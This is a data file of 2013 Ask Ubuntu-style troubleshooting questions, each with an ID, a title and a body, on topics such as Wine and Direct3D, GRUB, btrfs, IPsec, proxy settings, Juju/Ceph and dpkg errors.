375294	bumblebee + wine + direct3d problems	my system is ubuntu 13.10 and i 've got my bumblebee and wine works . commands such as optirun and wine works fine . then i follow the web http : //www.dedoimedo.com/games/wine-directx.html to install direct 9c . and after all of these , i try to run a little game which do n't need much resources , and it tells me : can not create dirent3d object . then i try to run other games , some call run perfectly using wine , but others which need direct3d support just can not run ! and also the same error : can not create dirent3d object . i tested the direct using dxdiag.exe . the directdraw model performs well , but the direct3d model just ca n't work . then i try to run the programs mentioned above with optirun , such as optirun wine dxdiag.exe , the d3d model also ca n't work . i know the way that wine runs direct program seems to transform it to opengl . so maybe the bumblebee changes some settings or files of original opengl that cause the problem . to solve the problem , i think i can run my game either on intel card or on nvidia card with optirun . but i do n't know how . can anyone tells me how to solve the problem ? thanks advance : )
375296	picasa 3.9 crashes when signing in all of a sudden	i 've been using picasa 3.9 on ubuntu for many years , and it served me well . i 've been able to sign into google+ using the wine hack ( there are several pages on the web about it , i do n't have one currently available ) , but since a few days ago ( =beginning of november 2013 ) , picasa crashes when i click on `` sign in with google account '' . there 's no further information available . it does create a .dmp file , but i do n't have any means on my laptop here to load up core dumps . i have the feeling this is a change on the server side , nothing changed on my local machine . is anyone else seeing this ? is there a work-around ? i 'm using picasa 3.9.0 build 136.2000 .
375298	minimising firefox causes xserver to crash	whenever i minimise firefox by using the minimise button or clicking the icon in the taskbar , within 10 seconds xserver crashes and brings me back to the login screen . this has only been verified on my laptop as i do not have another computer available to run kubuntu . laptop dell 7720 ( 17r se ) kubuntu 13.10 clean install nvidia 650m ( using bumblebee drivers for optimus ) memtest comes back ok. output from /var/log/kern.log nov 10 22:48:37 kubuntu-7720 kernel : [ 680.327504 ] virtuoso-t [ 5111 ] : segfault at ffffffffffffffff ip 0000000000939d75 sp 00007f116007f5d0 error 7 in virtuoso-t [ 400000+b09000 ]
375301	i 'm trying to install windows 7 , but the gnu grub menu pops up while in in windows boot menu	this is preventing me from re-installing windows 7 . can i make the gnu grub menu not pop up so i can get through the installation ?
375302	recover a folder after 'stop syncing this folder '	this is what i did : i had logged into `` https : //one.ubuntu.com/files/ '' gone to the `` files '' tab viewed the list of `` my synced folders '' selected `` more '' for one of them and chose `` stop syncing this folder '' problem : i am unable to view the folder which i stopped syncing in the site . how do i get it back ?
375303	when logging into i3 wm with gwm login loop	after i boot up and attempt to login from gwm with i3 wm selected , the screen goes blank for a few seconds then goes back to the login-screen . i can login with any other wm , such as unity , gnome.etc
375304	gnome 3 - gedit 3.10 any auto session saver plugin ?	i am on ubuntu 13.10 gnome shell 3.10.i want to automatically restore tabs in gedit that were open in previous session ( without any manual work ) - just like a web browser - ff/chrome . any such compatible plugin ?
375306	ubuntu btrfs : how to remove rootflags=subvol= @ from grub.cfg	when i mount `` btrfs '' as a root filesytem , the mount info is as below : root @ ubuntu1304btrfs : ~ # mount /dev/mapper/ubuntu1304btrfs -- vg-root on / type btrfs ( rw , subvol= @ ) is there a way to have a mount info without the `` subvol '' information ? i have tried executing what was mentioned here . i also updated the grub.cfg . still rootflags=subvol= @ is not removed . is there a way to remove this subvol information ? root @ ubuntu1304btrfs : /home # mount /dev/mapper/ubuntu1304btrfs -- vg-root on / type btrfs ( rw , subvol= @ ) /dev/mapper/ubuntu1304btrfs -- vg-root on /home type btrfs ( rw , subvol= @ home ) root @ ubuntu1304btrfs : / # stat / file : ‘/’ size : 262 blocks : 0 io block : 4096 directory device : 12h/18d inode : 256 links : 1 access : ( 0755/drwxr-xr-x ) uid : ( 0/ root ) gid : ( 0/ root ) access : 2013-11-11 19:56:04.548121873 +0530 modify : 2013-11-11 19:55:18.008120103 +0530 change : 2013-11-11 19:55:18.008120103 +0530 birth : - root @ ubuntu1304btrfs : / # stat /home/ file : ‘/home/’ size : 230 blocks : 0 io block : 4096 directory device : 19h/25d inode : 256 links : 1 access : ( 0755/drwxr-xr-x ) uid : ( 0/ root ) gid : ( 0/ root ) access : 2013-11-12 12:24:52.346377976 +0530 modify : 2013-11-12 12:24:50.338377900 +0530 change : 2013-11-12 12:24:50.338377900 +0530 birth : -
375307	getting windows - without usb or dvd	hello fellow linux users ! so lately i 've been missing my games that sadly have n't been ported to linux . i 'd like to switch over to windows , i 'm buying a bigger hdd so i can dual boot because i really love my linux . but , i ca n't get far because i have no thumbdrive or dvd drive.. i 've tried to mount and install windows from the setup.exe with a mounting program and wine but i could n't find a good windows .iso and i really do n't like pirating . please help !
375311	icons misses after installing ubuntu 13.10 on vmware 6.0	here is the screen shot . i searched same issue on internet but the icons still disappeared ... the hardware of my asus u41jis : cpu i5 , with ram 4g ( 1g for ubuntu ) , os : win7 home 64-bit , vmware v6.0 , and ubuntu is 13.10 ( i used both 32-bit and 64-bit and the icons just like the screen shot above ) . is there something i need to notice about the process of installation ? ?
375313	wine multiple users installation - app can not find some files	i used these commands to restrict wine , so standard users will not be able to run or install any app with wine . they will be able to run predefined apps under another identity . it is something like wine configuration for multiple users . sudo groupadd wine sudo chgrp wine /usr/bin/wine sudo chgrp wine /usr/bin/wine64 sudo chgrp wine /usr/bin/winedbg sudo chmod u=rwx , g=rx , o=r /usr/bin/wine sudo chmod u=rwx , g=rx , o=r /usr/bin/wine64 sudo chmod u=rwx , g=rx , o=r /usr/bin/winedbg sudo adduser -- disabled-password windows sudo usermod -ag wine windows sudo visudo % domain_users all= ( windows ) nopasswd : /winescr if user runs sudo -u windows /winescr and the script contains # /bin/bash /usr/bin/wine start /unix /programy/terasoft/matem/matem1.exe he gets error - /home/ $ user/.wine : permission denied , app does not start . if user runs sudo -u windows /winescr and the script contains # /bin/bash env wineprefix '' /home/windows/.wine '' /usr/bin/wine start /unix /programy/terasoft/matem/matem1.exe he gets these errors but app starts but gives error can not find lcf.inf . this file is located in same dir as executable file . err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\16x16\\apps\\a35f_hh.0.png '' err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\32x32\\apps\\a35f_hh.0.png '' err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\48x48\\apps\\a35f_hh.0.png '' err : menubuilder : write_freedesktop_mime_type_entry error writing file /home/x1/.local/share/mime/packages/x-wine-extension-cpl.xml err : menubuilder : write_freedesktop_mime_type_entry error writing file /home/x1/.local/share/mime/packages/x-wine-extension-dib.xml err : menubuilder : write_freedesktop_mime_type_entry error writing file /home/x1/.local/share/mime/packages/x-wine-extension-dll.xml err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\256x256\\apps\\7596_iexplore.0.png '' err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\48x48\\apps\\7596_iexplore.0.png '' err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\32x32\\apps\\7596_iexplore.0.png '' err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\16x16\\apps\\7596_iexplore.0.png '' err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\256x256\\apps\\4137_winhlp32.0.png '' err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\32x32\\apps\\4137_winhlp32.0.png '' err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\48x48\\apps\\4137_winhlp32.0.png '' err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\16x16\\apps\\4137_winhlp32.0.png '' err : menubuilder : write_freedesktop_mime_type_entry error writing file /home/x1/.local/share/mime/packages/x-wine-extension-htc.xml err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\16x16\\apps\\7765_winebrowser.0.png '' err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\32x32\\apps\\7765_winebrowser.0.png '' err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\48x48\\apps\\7765_winebrowser.0.png '' err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\16x16\\apps\\7765_winebrowser.0.png '' err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\32x32\\apps\\7765_winebrowser.0.png '' err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\48x48\\apps\\7765_winebrowser.0.png '' err : menubuilder : write_freedesktop_mime_type_entry error writing file /home/x1/.local/share/mime/packages/x-wine-extension-inf.xml err : menubuilder : write_freedesktop_mime_type_entry error writing file /home/x1/.local/share/mime/packages/x-wine-extension-ini.xml err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\256x256\\apps\\1e64_notepad.0.png '' err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\48x48\\apps\\1e64_notepad.0.png '' err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\32x32\\apps\\1e64_notepad.0.png '' err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\16x16\\apps\\1e64_notepad.0.png '' err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\16x16\\apps\\application-x-wine-extension-its.png '' err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\32x32\\apps\\application-x-wine-extension-its.png '' err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\48x48\\apps\\application-x-wine-extension-its.png '' err : menubuilder : write_freedesktop_mime_type_entry error writing file /home/x1/.local/share/mime/packages/x-wine-extension-its.xml err : menubuilder : write_freedesktop_mime_type_entry error writing file /home/x1/.local/share/mime/packages/x-wine-extension-jfif.xml err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\256x256\\apps\\7596_iexplore.0.png '' err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\48x48\\apps\\7596_iexplore.0.png '' err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\32x32\\apps\\7596_iexplore.0.png '' err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\16x16\\apps\\7596_iexplore.0.png '' err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\256x256\\apps\\7596_iexplore.0.png '' err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\48x48\\apps\\7596_iexplore.0.png '' err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\32x32\\apps\\7596_iexplore.0.png '' err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\16x16\\apps\\7596_iexplore.0.png '' err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\256x256\\apps\\7596_iexplore.0.png '' err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\48x48\\apps\\7596_iexplore.0.png '' err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\32x32\\apps\\7596_iexplore.0.png '' err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\16x16\\apps\\7596_iexplore.0.png '' err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\256x256\\apps\\7596_iexplore.0.png '' err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\48x48\\apps\\7596_iexplore.0.png '' err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\32x32\\apps\\7596_iexplore.0.png '' err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\16x16\\apps\\7596_iexplore.0.png '' err : menubuilder : write_freedesktop_mime_type_entry error writing file /home/x1/.local/share/mime/packages/x-wine-extension-lnk.xml err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\256x256\\apps\\application-x-wine-extension-msp.png '' err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\32x32\\apps\\application-x-wine-extension-msp.png '' err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\48x48\\apps\\application-x-wine-extension-msp.png '' err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\16x16\\apps\\application-x-wine-extension-msp.png '' err : menubuilder : write_freedesktop_mime_type_entry error writing file /home/x1/.local/share/mime/packages/x-wine-extension-msp.xml err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\256x256\\apps\\7596_iexplore.0.png '' err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\48x48\\apps\\7596_iexplore.0.png '' err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\32x32\\apps\\7596_iexplore.0.png '' err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\16x16\\apps\\7596_iexplore.0.png '' err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\256x256\\apps\\2ef4_wordpad.0.png '' err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\48x48\\apps\\2ef4_wordpad.0.png '' err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\32x32\\apps\\2ef4_wordpad.0.png '' err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\16x16\\apps\\2ef4_wordpad.0.png '' err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\256x256\\apps\\1e64_notepad.0.png '' err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\48x48\\apps\\1e64_notepad.0.png '' err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\32x32\\apps\\1e64_notepad.0.png '' err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\16x16\\apps\\1e64_notepad.0.png '' err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\16x16\\apps\\1cd8_rundll32.0.png '' err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\32x32\\apps\\1cd8_rundll32.0.png '' err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\48x48\\apps\\1cd8_rundll32.0.png '' err : menubuilder : write_freedesktop_mime_type_entry error writing file /home/x1/.local/share/mime/packages/x-wine-extension-vbs.xml err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\256x256\\apps\\2ef4_wordpad.0.png '' err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\48x48\\apps\\2ef4_wordpad.0.png '' err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\32x32\\apps\\2ef4_wordpad.0.png '' err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\16x16\\apps\\2ef4_wordpad.0.png '' err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\16x16\\apps\\7765_winebrowser.0.png '' err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\32x32\\apps\\7765_winebrowser.0.png '' err : menubuilder : convert_to_native_icon error 0x80070005 creating output file l '' z : \\home\\x1\\.local\\share\\icons\\hicolor\\48x48\\apps\\7765_winebrowser.0.png '' the databases in [ /home/x1/.local/share/applications ] could not be updated . and if user runs sudo -u windows -h /winescr and the script contains # /bin/bash /usr/bin/wine start /unix /programy/terasoft/matem/matem1.exe he does not get any error to his terminal , app starts but there is same error that can not find lcf.inf what can cause that app can not find lcf.inf located in same directory ? permissions are correct and if i run app with standard wine , there is no problem .
375315	configuring ipsec with static keys	i have linux ubuntu pc connected to evalve board . linux pc ( eht0 ) -- -- -- -- -- -- -- - ( eth0 ) evalve board - ipsec functionality ( ah , esp , enc/dec ) is done at fast path in evalve board . ( config rule are added for the same . ) my requirement is to send ipsec packets from linux pc to evalve board in transport mode , where keys are known to both . i was referring the below link to generate the ipsec packets with static keys : https : //help.ubuntu.com/community/ipsechowto http : //www.infond.fr/2010/04/basics-9-tutorial-ipsec-transport-mode.html but if i capture the send packets in wireshark , i do n't see the packets encrypted . question : is there any additional config i need to do other than mentioned in the above links ? how to i determine why packets are not encrypted . any logs to refer ? ( i assume i do n't need any tools i.e . raccoon/openswan/strongswan as they are for exchanging keys ) any pointers/help on this would be appreciated . ~ashish
375316	how to create application to find it with unity	i tried creating a menu entry with alacarte for eclipse , but the item does n't appear once created . also i tried doing in sudo but nothing . i want to be able to run eclipse by pressing and typing `` eclipse '' or another ide i have . searching for internet and tried different tips but no result . also tried creating an eclipse.desktop file on my desktop and drag & drop to the unity sidebar , but it 's lost the icon and i ca n't be able to earch it with key .
375317	installing ubuntu on an old pc ?	i found this old desktop computer in our attic and it seems that its hardware is still in good condition . it is running a windows xp and i wish to change its os . i searched the web and found about ubuntu os . how can i install this free os to that old pc ? can i install it through dvd/cd ?
375321	ceph did not deploy to machine 0 why ?	love juju and this ceph charms is great . can you help with this issue ... i have deployed the ceph charm to a maas cluster of 3 nodes ( machine : 0 , 1 , & 2 ) i used this command to deploy : juju deploy -- config ./ceph.yaml -n 3 ceph now when i check the juju status i see that ceph has gone to machine : 1 , 2 , & 3 . since i do n't have a machine 3 it is pending . how can i get it to deploy to the 3 node i already have ? here is my juju status ... juju status 2013-11-11 20:46:51,893 info connecting to environment ... 2013-11-11 20:46:52,563 info connected to environment . machines : 0 : agent-state : running dns-name : 8ypjm.ceph instance-id : /maas/api/1.0/nodes/node-d8686094-48c9-11e3-b313-deadbeeefb1a/ instance-state : unknown 1 : agent-state : running dns-name : a8nke.ceph instance-id : /maas/api/1.0/nodes/node-88a58b34-48cb-11e3-9d7d-deadbeeefb1a/ instance-state : unknown 2 : agent-state : running dns-name : f7fby.ceph instance-id : /maas/api/1.0/nodes/node-c7d89b0c-48cb-11e3-b313-deadbeeefb1a/ instance-state : unknown 3 : instance-id : pending services : ceph : charm : cs : precise/ceph-16 relations : mon : - ceph units : ceph/0 : agent-state : start-error machine : 1 public-address : a8nke.ceph ceph/1 : agent-state : start-error machine : 2 public-address : f7fby.ceph ceph/2 : agent-state : pending machine : 3 public-address : null 2013-11-11 20:46:52,999 info 'status ' command finished successfully
375328	change screen orientation shortcut ?	in windows i can change screen orientation by `` ctrl + alt + arrow '' as arrow can be up , left , down or right . what is the shortcut on ubuntu ? thanks !
375329	how do you install visual studio 2010 professional ?	how can i install visual studio 2010 framework4 on ubuntu 13.04 ? my project was written with visual studio ( visual basic ) 2010 in windows 7 . now that i installed ubuntu 13.04 , can i complete my project with it ?
375331	mouse-scroll does not work in gedit	since the update to 13.10 scrolling in gedit does not work anymore . anywhere else it does . it could be related with bug # 1240957 “scrolling behaviour and window focus has changed a ... ” : bugs : “gtk+3.0” package : ubuntu but i need scrolling . updating to the latest gtk3.0 available in proposed/unsupported did not help . does anybody have the same problem ? how i can solve this problem
375332	how can i modify firefox safe-mode to allow one extension to function ?	when you enter : firefox -safe-mode it restarts firefox in `` safe mode '' with the whole add on/extensions or settings disabled . see safe mode i would like to have a particular extension , procon latte , for example , not to be disabled . how do i do that by command line and which file to modify ?
375342	share internet over wireless without an ap capable card	i have a windows 7 laptop and a ubuntu laptop , and i would like to share my internet from the ethernet port over wifi . if i have my windows 7 laptop connected to the ethernet connection i can join an ad-hoc wifi network with my ubuntu laptop and use the internet on it . if i connect the ubuntu laptop to the ethernet connection and create an ad-hoc network , my windows 7 laptop can join it but ca n't connect to the internet . the card in the ubuntu pc is a intel pro/wireless 2200bg and it supports these interface modes : ibbs ( this is ad-hoc and all i should need from what i understand ) managed
375344	is there a secure way to pass authentication parameters for proxy to applications ?	i am behind a proxy server and need to specify authentication parameters to access the internet . for this , i have exported my username , password , host and port_no in my /home/ $ user/.bashrc file and in /etc/apt/apt.conf file , which are human readable . for example acquire : :http : :proxy `` http : // < username > : < password > @ 172.16.0.2:8080 '' ; acquire : :ftp : :proxy `` ftp : // < username > : < password > @ 172.16.0.2:8080/ '' ; acquire : :https : :proxy `` https : // < username > : < password > @ 172.16.0.2:8080/ '' ; this causes my password to be openly visible to anyone who has read access to these files . is there a secure way of passing these parameters to the applications that need proxy authentication parameters without having to write in such human readable form ? note : it would be good to know of permanent methods . i know i can do this temporarily by exporting each time i open a new session . but i will have to do this everytime i open a new session , which i want to avoid .
375348	auto send error reports	i am getting quite a lot of error reports ( i guess i 've messed up with nvidia drivers ... ) so , is there a way to auto send them ? it 's quite annoying to see all those messages , but i guess it 's helpful for them to be sent !
375349	forcing upgrade or how to upgrade packages after update failed	how do i continue upgrade or fix upgrade as upgrading in 13.04 to 13.10 failed . i 'm currently running terminal in restore mode . i get the error unmet dependencies , but tried to install apt-get -f install , but get this error : unable to fetch some archives . using apt-get update also brings errors for example : failed to fetch http : archive.canonical.com/ubuntu/dists/quantal/release.gpg could not resolve 'archive.canonical.com . is it my internet connection ? its currently connected via a network cable and internet is on other computers . if internet on my ubuntu 13.10 , how do i switch it on ? or how can fix my upgrade problem that i can boot ubuntu normal , backup , then format and reload ubuntu 13.10 properly ? i posted this problem that has also linked to this problem i mentioned : upgrading to ubuntu 13.10 failed/crashed . i did manager to install/upgrade some of the files and got ubuntu 13.10 to reboot , but not 100 % , as it is slow and the unity desktop is not showing 100 % . in trying some of the commands online , i get the error that the activity manager is not installed , when trying to install it , it conflicts with activity-log-manager-common . please assist .
375350	renaming hdd 's in ubuntu 13.10	i have 2 samsung 1tb g3 external drives and every time i start up my pc ubuntu only detects 1 of them ( presumably the one that boots quickest ) . i assume it 's because they 're identical devices and that ubuntu does n't automatically designate drive letters etc like windows . if i unplug both drives and put them in while the system is on then 1 is designated '1tb partition ' while the other is named 'local disk ' . is there a way to rename these drives so that they 're visible at start up or do i need to change the names in windows ?
375351	trouble updating metapackage	i 'm having trouble downloading xfce4 metapackage . i do n't have a desktop yet just cmd line and this is my first time on linux . sudo apt-get install xfce4 brings back unable to locate package xfce4 does that with all packages , leads me to sudo apt-get update leaves me with temporary failure resolving 'downloads-distro.mongodb.org' read some solutions to fix this but it had me going in circles with no avail . need to get this working from cmd prompt . so i 'm having trouble updating and am lost here without a desktop client . if anyone can help that would be great .
375354	quickly app not working on raspberry pi	i started developing an app using quickly which will target a raspberry pi board . i have created a single screen so far which contains a few buttons and labels . i run this on the board by doing a quickly package command on my system and then installing the package onto the board using dpkg command . everything seemed to be working fine until i started adding images to my button widgets . what i 'm trying to do is , in glade , i 'm setting a image child widget to appear onto a button widget . the included image is a .png file on my system . i then add the following line of code on my main.py file , to always show the image on the button along with the text . self.mainwindow_bottombox.appliancesbutton.set_always_show_image ( true ) this is working correctly on my development system which is running linux mint olivia , but does not work on the pi board . in fact the application does not even start on the board . if i exclude the image adding part then the application works correctly on the board.i am not able to work out what the cause of this might be . i would also like to add that a similar problem occurred earlier when trying to include a css file in my code for widget styling . path = os.getcwd ( ) + `` /defaulttheme.css '' cssprovider = gtk.cssprovider ( ) retval = cssprovider.load_from_path ( path ) if retval : print `` file loaded '' else : print `` could not load file '' gtk.stylecontext.add_provider_for_screen ( gdk.screen.get_default ( ) , cssprovider , gtk.style_provider_priority_user ) the above code to do widget styling using css file runs on my development system but not on the board but if i replace the above code by doing the following css = gtk.cssprovider ( ) css.load_from_data ( ' '' gtkwindow { background : # 2f3e51 ; } # toplevelgrid gtkbutton { background : # 3598db ; } ... ... ... ... ... this method works correctly on the board . again no idea why this works and the earlier method does not.. any help on this would be greatly appreciated .
375355	how to create ad-hoc wireless and share network ?	i 've two laptop and i want to create a hotspot to share network and internet connection . currently i 'm using ubuntu 13.10 and uname is : linux vinay-vostro-1550 3.11.0-13-generic # 20-ubuntu smp wed oct 23 07:38:26 utc 2013 x86_64 x86_64 x86_64 gnu/linux ad-hoc hotspot was working till ubuntu 12.04 , later ubuntu 12.* . * this is screwing ... there is also lots of network problem with all later version since 12.* . * is there any alternate solution or patch to create hotspot and share network ?
375356	problems with wine audio	i can not find where the turn on jack in the audio tab in wine . help please .
375357	how to install ubuntu os in windowns 7 running os ?	system running windows 7 os , downloaded ubuntu 13.04 .iso file and located in another hard disk partiton . i want to install ubuntu os alongside windows 7 . but i want install ubuntu os without booting usb or dvd or cd . how to do it ? i need help
375362	install/downgrade kernel to v3.5.5 on ubuntu 13.04	i 've been looking around the internet for a solution to downgrade the kernel from 3.8 to 3.5.5 since i 've got the amd/ati radeon mobility hd 5600 graphic card on my machine . this video card in unfortunately not supported by the 3.8 kernel . and then when i 've downgraded the kernel i need to install a version 12 . * of the amd catalyst driver . there is too much in stake to wipe out the current installation of the os and install an older os . so i would like to avoid doing that to the ends of the world . hope someone can help me with this one ? kind regards ! villi magg .
375364	how to fix the apt-get -f install error	i am getting continuous error when i run the command sudo apt-get -f install the output of the command is as follows : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : default-jre-headless icedtea-7-jre-jamvm openjdk-7-jre openjdk-7-jre-headless openjdk-7-jre-lib suggested packages : fonts-ipafont-gothic fonts-ipafont-mincho ttf-telugu-fonts ttf-oriya-fonts ttf-kannada-fonts ttf-bengali-fonts the following new packages will be installed : default-jre-headless icedtea-7-jre-jamvm openjdk-7-jre openjdk-7-jre-headless openjdk-7-jre-lib 0 upgraded , 5 newly installed , 0 to remove and 28 not upgraded . 2 not fully installed or removed e : could not get lock /var/cache/apt/archives/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock directory /var/cache/apt/archives/ satish @ satish-inspiron-n5010 ~ $ please guide asap
375365	ubuntu is not booting	last night i was trying to upgrade my ubuntu 12.04 to 12.10. every update was completed and finally when it asked for restart , i restarted the system , then onwords it is not starting up showing message error : file not found . grub rescue > _ can any one plz help how to get rid of this problem . my system is dual os ( windows 7 and ubuntu ) hp pavellion dv4 series
375366	amixer volume controls applies twice	the volume increment or decrement is happening double the intended amount using amixer for my alsa driver using ./amixer -c 0 set master 1- command . this happens because by default volume controls apply for both playback and capture modules . my alsa driver config does n't enabled any of the capture controls . even if there is no capture enabled , the function from simple_none.c returns true for capture channel . all the capture volume controls are applied to my playback driver . static int is_ops ( snd_mixer_elem_t *elem , int dir , int cmd , int val ) case sm_ops_is_channel : return ( unsigned int ) val < s- > str [ dir ] .channels ; ./amixer -c 0 set master playback 10+ ./amixer -c 0 set master playback 10 - ./amixer -c 0 set master capture 10+ ./amixer -c 0 set master capture 10 - i suspect capture is enabled by default in my system for alsa drivers . let me know what i need to do to ensure capture disabled .
375369	how to fix dpkg configure errors ?	i get the following error . how to fix it ? root @ santanu-compaq-presario-c700-notebook-pc : /home/santanu # sudo dpkg -- configure gconf2 dpkg : error processing gconf2 ( -- configure ) : package gconf2 is already installed and configured errors were encountered while processing : gconf2
375370	kubuntu 12.04 wo n't start	i have dual boot config with kubuntu 12.04 and windows7 . my problem started this morning when i tried to boot kubuntu . everything worked fine a couple of days ago and i have not done any mayor system configurations since then . choosing kubuntu options from grub gives me this screen a couple of minutes later this screen is shown and then it gets stuck . have been waiting for ~5mins without anything happening . i have tried running fsck from recovery menu without any errors . i have also tried booting in failsafex mode which gives me `` fatal server error : no screens found '' . apt-get update gives me `` duplicate sources.list entry '' . i have also tried fixing broken packages from recovery menu . what should i do next ?
